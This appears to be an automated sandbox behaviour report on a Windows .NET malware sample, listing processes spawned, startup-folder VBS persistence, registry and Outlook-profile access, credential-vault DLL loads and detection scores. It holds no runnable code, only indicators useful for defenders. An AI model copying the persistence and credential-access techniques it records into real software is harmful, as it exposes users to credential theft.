Source: C:\Users\user\Desktop\Ref#2056119.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ishon.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ishon.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Ref#2056119.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Ref#2056119.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Ref#2056119.exe

ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\Ref#2056119.exe

File read: C:\Users\user\Desktop\Ref#2056119.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Ref#2056119.exe "C:\Users\user\Desktop\Ref#2056119.exe"
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe "C:\Users\user\AppData\Local\Temp\Liphmahu.exe"
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process created: C:\Users\user\Desktop\Ref#2056119.exe "C:\Users\user\Desktop\Ref#2056119.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe "C:\Users\user\AppData\Local\Temp\Liphmahu.exe"
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 932
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe "C:\Users\user\AppData\Local\Temp\Liphmahu.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process created: C:\Users\user\Desktop\Ref#2056119.exe "C:\Users\user\Desktop\Ref#2056119.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe "C:\Users\user\AppData\Local\Temp\Liphmahu.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"

Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\ishon.exe	Section loaded: wintypes.dll

Source: C:\Users\user\Desktop\Ref#2056119.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Ref#2056119.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Ref#2056119.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Ref#2056119.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Ref#2056119.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.pdbsR source: Liphmahu.exe, 00000008.00000002.3111190217.00000000010F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: Liphmahu.exe, 00000008.00000002.3111190217.0000000001148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000004082000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2058549679.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003855000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004360000.00000004.00000800.00020000.00000000.sdmp
